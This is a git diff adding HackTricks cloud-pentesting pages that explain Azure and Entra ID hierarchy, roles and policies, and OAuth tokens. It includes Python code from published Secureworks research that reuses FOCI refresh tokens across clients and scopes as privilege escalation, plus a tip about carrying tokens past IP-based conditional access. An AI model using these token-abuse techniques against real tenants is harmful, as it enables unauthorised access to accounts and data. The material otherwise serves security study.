+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Organization Hierarchy + +

https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png

+ +### Management Groups + +* It can contain **other management groups or subscriptions**. +* This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group. +* **10,000 management** groups can be supported in a single directory. +* A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level. +* Each management group and subscription can support **only one parent**. +* Even if several management groups can be created **there is only 1 root management group**. + * The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**. +* All subscriptions within a single management group must trust the **same Entra ID tenant.** + +

https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

+ +### Azure Subscriptions + +* It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed. +* Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions. +* It **trust only one Entra ID** directory +* **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription + +### Resource Groups + +[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group. + +All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted. + +

https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1

+ +### Azure Resource IDs + +Every resource in Azure has an Azure Resource ID that identifies it. + +The format of an Azure Resource ID is as follows: + +* `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}` + +For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this: + +* `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM` + +## Azure vs Entra ID vs Azure AD Domain Services + +### Azure + +Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises. + +### Entra ID (formerly Azure Active Directory) + +Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others. + +### Entra Domain Services (formerly Azure AD DS) + +Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. 
It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments. + +## Entra ID Principals + +### Users + +* **New users** + * Indicate email name and domain from selected tenant + * Indicate Display name + * Indicate password + * Indicate properties (first name, job title, contact info…) + * Default user type is “**member**” +* **External users** + * Indicate email to invite and display name (can be a non Microsft email) + * Indicate properties + * Default user type is “**Guest**” + +### Members & Guests Default Permissions + +You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to: + +* Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties +* Invite Guests (_can be turned off_) +* Create Security groups +* Read non-hidden Group memberships +* Add guests to Owned groups +* Create new application (_can be turned off_) +* Add up to 50 devices to Azure (_can be turned off_) + +{% hint style="info" %} +Remember that to enumerate Azure resources the user needs an explicit grant of the permission. 
+{% endhint %} + +### Users Default Configurable Permissions + +* **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** + * Register Applications: Default **Yes** + * Restrict non-admin users from creating tenants: Default **No** + * Create security groups: Default **Yes** + * Restrict access to Microsoft Entra administration portal: Default **No** + * This doesn’t restrict API access to the portal (only web) + * Allow users to connect work or school account with LinkedIn: Default **Yes** + * Show keep user signed in: Default **Yes** + * Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings) + * Read other users: Default **Yes** (via Microsoft Graph) +* **Guests** + * **Guest user access restrictions** + * **Guest users have the same access as members** grants all member user permissions to guest users by default. + * **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed. + * **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one. 
+ * **Guests can invite** + * **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default** + * **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions** + * **Only users assigned to specific admin roles can invite guest users** + * **No one in the organization can invite guest users including admins (most restrictive)** + * **External user leave**: Default **True** + * Allow external users to leave the organization + +{% hint style="success" %} +Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions. +{% endhint %} + +### **Groups** + +There are **2 types of groups**: + +* **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members. +* **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users. + * This will have an **email address** with the domain of the EntraID tenant. + +There are **2 types of memberships**: + +* **Assigned**: Allow to manually add specific members to a group. +* **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change. + +### **Service Principals** + +A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity. 
+ +It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it. + +* If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again. +* If you choose certificate authentication, make sure the **application will have access over the private key**. + +### App Registrations + +An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions. + +#### Key Components: + +1. **Application ID (Client ID):** A unique identifier for your app in Azure AD. +2. **Redirect URIs:** URLs where Azure AD sends authentication responses. +3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions). + 1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID). +4. **API Permissions:** Specifies what resources or APIs the app can access. +5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect). +6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant. + 1. The **service principal** will get all the requested permissions it was configured with. + +### Default Consent Permissions + +**User consent for applications** + +* **Do not allow user consent** + * An administrator will be required for all apps. 
+* **Allow user consent for apps from verified publishers, for selected permissions (Recommended)** + * All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization. + * **Default** low impact permissions (although you need to accept to add them as low): + * User.Read - sign in and read user profile + * offline\_access - maintain access to data that users have given it access to + * openid - sign users in + * profile - view user's basic profile + * email - view user's email address +* **Allow user consent for apps (Default)** + * All users can consent for any app to access the organization's data. + +**Admin consent requests**: Default **No** + +* Users can request admin consent to apps they are unable to consent to +* If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests + * Configure also if users will receive email notifications and expiration reminders + +### **Managed Identity (Metadata)** + +Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure. + +There are two types of managed identities: + +* **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you. +* **User-assigned**. 
It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**. + +Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it. + +### Enterprise Applications + +It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to. + +**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities. + +### Administrative Units + +Administrative units allows to **give permissions from a role over a specific portion of an organization**. + +Example: + +* Scenario: A company wants regional IT admins to manage only the users in their own region. +* Implementation: + * Create Administrative Units for each region (e.g., "North America AU", "Europe AU"). + * Populate AUs with users from their respective regions. + * AUs can **contain users, groups, or devices** + * AUs support **dynamic memberships** + * AUs **cannot contain AUs** + * Assign Admin Roles: + * Grant the "User Administrator" role to regional IT staff, scoped to their region's AU. +* Outcome: Regional IT admins can manage user accounts within their region without affecting other regions. 
+ +### Entra ID Roles + +* In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID + * Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) +* The most privileged role is **Global Administrator** +* In the Description of the role it’s possible to see its **granular permissions** + +## Roles & Permissions + +**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)` + +**Roles** assigned to **groups** are **inherited** by all the **members** of the group. + +Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group. + +### **Classic Roles** + +| **Owner** |
  • Full access to all resources
  • Can manage access for other users
| All resource types | +| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ | +| **Contributor** |
  • Full access to all resources
  • Cannot manage access
| All resource types | +| **Reader** | • View all resources | All resource types | +| **User Access Administrator** |
  • View all resources
  • Can manage access for other users
| All resource types | + +### Built-In roles + +[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.** + +**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources: + +| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 | +| ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ | +| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 | + +This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**. + +* Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). 
+* Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference). + +### Custom Roles + +* It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) +* They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups) +* It’s possible to configure all the granular permissions the custom role will have +* It’s possible to exclude permissions + * A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere +* It’s possible to use wildcards +* The used format is a JSON + * `actions` are for control actions over the resource + * `dataActions` are permissions over the data within the object + +Example of permissions JSON for a custom role: + +```json +{ + "properties": { + "roleName": "", + "description": "", + "assignableScopes": [ + "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f" + ], + "permissions": [ + { + "actions": [ + "Microsoft.DigitalTwins/register/action", + "Microsoft.DigitalTwins/unregister/action", + "Microsoft.DigitalTwins/operations/read", + "Microsoft.DigitalTwins/digitalTwinsInstances/read", + "Microsoft.DigitalTwins/digitalTwinsInstances/write", + "Microsoft.CostManagement/exports/*" + ], + "notActions": [ + "Astronomer.Astro/register/action", + "Astronomer.Astro/unregister/action", + "Astronomer.Astro/operations/read", + "Astronomer.Astro/organizations/read" + ], + "dataActions": [], + "notDataActions": [] + } + ] + } +} +``` + +### Permissions order + +* In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**. +* An explicit **deny role assignment takes precedence** over the role granting the permission. + +

https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

+ +### Global Administrator + +Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default. + +Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\ +This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties) + +
+ +### Azure Policies + +**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking. + +Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources. + +#### **Key Concepts** + +1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required. +2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group). +3. **Initiatives**: A collection of policies grouped together for broader enforcement. +4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append"). + +**Some examples:** + +1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance. +2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments. +3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs. +4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. 
This is useful for cost tracking, ownership, or categorization of resources. +5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network. +6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption. + +Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups. + +Azure policy json example: + +```json +{ + "policyRule": { + "if": { + "field": "location", + "notIn": [ + "eastus", + "westus" + ] + }, + "then": { + "effect": "Deny" + } + }, + "parameters": {}, + "displayName": "Allow resources only in East US and West US", + "description": "This policy ensures that resources can only be created in East US or West US.", + "mode": "All" +} +``` + +### Permissions Inheritance + +In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned. + +This hierarchical structure allows for efficient and scalable management of access permissions. + +
+ +### Azure RBAC vs ABAC + +**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\ +However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**. + +Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\ +You **cannot** explicitly **deny** **access** to specific resources **using conditions**. + +## References + +* [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) +* [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions) +* [https://abouttmc.com/glossary/azure-subscription/#:\~:text=An%20Azure%20subscription%20is%20a,the%20subscription%20it%20belongs%20to.](https://abouttmc.com/glossary/azure-subscription/) +* [https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview#how-azure-rbac-determines-if-a-user-has-access-to-a-resource) +* 
[https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md new file mode 100644 index 0000000000..59ef23f065 --- /dev/null +++ b/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md @@ -0,0 +1,233 @@ +# Az - Tokens & Public Applications + + + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources. + +### OAuth + +**Key Participants in OAuth 2.0:** + +1. **Resource Server (RS):** Protects resources owned by the resource owner. +2. **Resource Owner (RO):** Typically an end-user who owns the protected resources. +3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner. +4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them. + +**Scopes and Consent:** + +* **Scopes:** Granular permissions defined on the resource server that specify access levels. +* **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes. + +**Microsoft 365 Integration:** + +* Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications. +* These applications are deeply integrated and often have interdependent service relationships. +* To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications. +* **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l. +* These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces. + +**Client Application Types:** + +1. **Confidential Clients:** + * Possess their own credentials (e.g., passwords or certificates). + * Can **securely authenticate themselves** to the authorization server. +2. 
**Public Clients:** + * Do not have unique credentials. + * Cannot securely authenticate to the authorization server. + * **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application. + +## Authentication Tokens + +There are **three types of tokens** used in OIDC: + +* [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default. +* **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**. +* **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens). + * A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**. + * A refresh token is encrypted and only Microsoft can decrypt it. + * Getting a new refresh token doesn't revoke the previous refresh token. + +{% hint style="warning" %} +Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**. 
+{% endhint %} + +### Access Tokens "aud" + +The field indicated in the "aud" field is the **resource server** (the application) used to perform the login. + +The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token: + +{% hint style="danger" %} +Note that the following are just the APIs supported by `az account get-access-token` but there are more. +{% endhint %} + +
+ +aud examples + +* **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD). + * `https://graph.windows.net/` + +- **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more. + * `https://management.core.windows.net/ or https://management.azure.com/` + +* **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud. + * `https://batch.core.windows.net/` + +- **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service. + * `https://datalake.azure.net/` + +* **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content. + * `https://rest.media.azure.net` + +- **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services. + * `https://graph.microsoft.com` + +* **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB. + * `https://ossrdbms-aad.database.windows.net` + +
+ +### Access Tokens Scopes "scp" + +The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to. + +If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT. + +### Get refresh & access token example + +```python +# Code example from https://github.com/secureworks/family-of-client-ids-research +import msal +import requests +import jwt +from pprint import pprint +from typing import Any, Dict, List + + +# LOGIN VIA CODE FLOW AUTHENTICATION +azure_cli_client = msal.PublicClientApplication( + "04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client +) +device_flow = azure_cli_client.initiate_device_flow( + scopes=["https://graph.microsoft.com/.default"] +) +print(device_flow["message"]) + +# Perform device code flow authentication + +azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow( + device_flow +) +pprint(azure_cli_bearer_tokens_for_graph_api) + + + +# DECODE JWT +def decode_jwt(base64_blob: str) -> Dict[str, Any]: + """Decodes base64 encoded JWT blob""" + return jwt.decode( + base64_blob, options={"verify_signature": False, "verify_aud": False} + ) +decoded_access_token = decode_jwt( + azure_cli_bearer_tokens_for_graph_api.get("access_token") +) +pprint(decoded_access_token) + + +# GET NEW ACCESS TOKEN AND REFRESH TOKEN +new_azure_cli_bearer_tokens_for_graph_api = ( + # Same client as original authorization + azure_cli_client.acquire_token_by_refresh_token( + azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), + # Same scopes as original authorization + scopes=["https://graph.microsoft.com/.default"], + ) +) +pprint(new_azure_cli_bearer_tokens_for_graph_api) +``` + +## FOCI Tokens Privilege Escalation + +Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the 
**application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended. + +Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them." + +Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server. + +Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv). 
+ +### Get different scope + +Following with the previous example code, in this code it's requested a new token for a different scope: + +```python +# Code from https://github.com/secureworks/family-of-client-ids-research +azure_cli_bearer_tokens_for_outlook_api = ( + # Same client as original authorization + azure_cli_client.acquire_token_by_refresh_token( + new_azure_cli_bearer_tokens_for_graph_api.get( + "refresh_token" + ), + # But different scopes than original authorization + scopes=[ + "https://outlook.office.com/.default" + ], + ) +) +pprint(azure_cli_bearer_tokens_for_outlook_api) +``` + +### Get different client and scopes + +```python +# Code from https://github.com/secureworks/family-of-client-ids-research +microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c") +microsoft_office_bearer_tokens_for_graph_api = ( + # This is a different client application than we used in the previous examples + microsoft_office_client.acquire_token_by_refresh_token( + # But we can use the refresh token issued to our original client application + azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"), + # And request different scopes too + scopes=["https://graph.microsoft.com/.default"], + ) +) +# How is this possible? +pprint(microsoft_office_bearer_tokens_for_graph_api) +``` + +## References + +* [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md new file mode 100644 index 0000000000..44e42482b3 --- /dev/null +++ b/pentesting-cloud/azure-security/az-device-registration.md @@ -0,0 +1,138 @@ +# Az - Device Registration + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
